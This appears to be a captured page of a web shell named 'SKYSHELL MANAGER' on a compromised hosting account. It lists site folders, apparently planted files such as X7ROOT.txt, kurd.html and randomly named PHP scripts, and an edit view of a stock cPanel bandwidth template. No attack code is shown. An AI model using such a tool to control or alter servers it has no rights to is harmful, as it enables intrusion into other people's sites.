📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: bwday.html.tt
[% SET CPANEL.CPVAR.dprefix = "../" %] [% WRAPPER '_assets/master.html.tt' page_title = locale.maketext("Bandwidth") app_key = 'bandwidth' -%] [% USE CPDate; SET timezone = CPANEL.cookies.timezone; SET month_index = RAW_FORM('month') - 1; SET starttime = CPDate.timezone_timelocal( timezone, 0, 0, 0, RAW_FORM('day'), month_index, RAW_FORM('year') ); SET endtime = CPDate.add_local_interval( starttime, 1, 'day', timezone, ) - 1; SET PROTOCOLS = execute_or_die( 'Bandwidth', 'get_enabled_protocols' ).data; SET expirations = execute( 'Bandwidth', 'get_retention_periods', { 'api.sort_column' => 'retention', 'api.sort_method' => 'numeric', }, ).data; SET now = CPANEL.now; SET time_grouping = 'year_month_day_hour_minute'; SET interval = '5min'; USE dumper; FOR exp = expirations; IF (exp.interval == '5min') && (starttime < (now - exp.retention)); SET time_grouping = 'year_month_day_hour'; SET interval = 'hourly'; END; IF exp.interval == 'hourly' && starttime < (now - exp.retention); SET time_grouping = 'year_month_day'; SET interval = 'daily'; END; END; SET form_target = RAW_FORM('target'); SET form_domain = RAW_FORM('domain'); SET query_specific_domain_yn = (form_domain != ''); SET query_specific_target_yn = (form_target != CPANEL.authuser); SET domains = query_specific_domain_yn ? form_domain : query_specific_target_yn ? form_target : ''; SET bwdata = execute( 'Bandwidth', 'query', { timezone => timezone, grouping => "protocol|$time_grouping", interval => interval, domains => domains, start => starttime, end => endtime, }, ); PROCESS '_bandwidth_graph_include.tmpl'; -%] <!-- TODO: put somewhere separately --> <style type="text/css"> .data-descriptor { text-align: center; } </style> <div class="body-content"> <p class="description">[% your_timezone_is() %]</p> <h4 class="data-descriptor"> [% query_specific_domain_yn ? form_target.html() _ ' — ' : '' %] [% locale.datetime( CPDate.timegm( 0, 0, 0, RAW_FORM('day'), month_index, RAW_FORM('year') ), 'date_format_full' ); %] </h4> <div class="bw-time-graph" id="bwgraph_el"></div> [% INCLUDE _assets/return_link.html.tt return_location="javascript:history.go(-1)" return_link_text=locale.maketext("Go Back") %] </div> <script> var PROTOCOLS = [% JSON.stringify(PROTOCOLS) %]; //XXX: LOCALE’s CLDR isn’t loading correctly on page load. wait_for_CLDR_to_load( function() { var did_sth = Bandwidth_Graph.draw_protocols_time_graph( { time_format: function(t) { return LOCALE.local_datetime(t, "time_format_short") }, container_path: "#bwgraph_el", protocols_order: PROTOCOLS, min_date: [% "${starttime}000" %], max_date: [% "${endtime}000" %], resolution: [% JSON.stringify(interval) %], api_protocol_data: [% JSON.stringify(bwdata.data) %] } ); [% IF !query_specific_domain_yn -%] if (did_sth) { Bandwidth_Graph.draw_protocols_time_graph_key({ container_path: "#bwgraph_el", protocols_order: PROTOCOLS }); } [% END -%] } ); CPTimezone.show_cookie_timezone_mismatch_nodes(); </script> [% END #wrapper -%]
Save